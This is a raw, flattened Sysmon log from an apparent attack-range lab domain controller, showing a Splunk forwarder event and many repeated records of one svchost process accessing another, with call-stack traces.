23542300x80000000000000004769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.421{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65D1F0EBB6FEE5F555A57057419111DF,SHA256=36F9E6AE2F3B424F70429A33063F570F199FAFB05BFF06BF3991F4084FD781FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.374{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.359{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll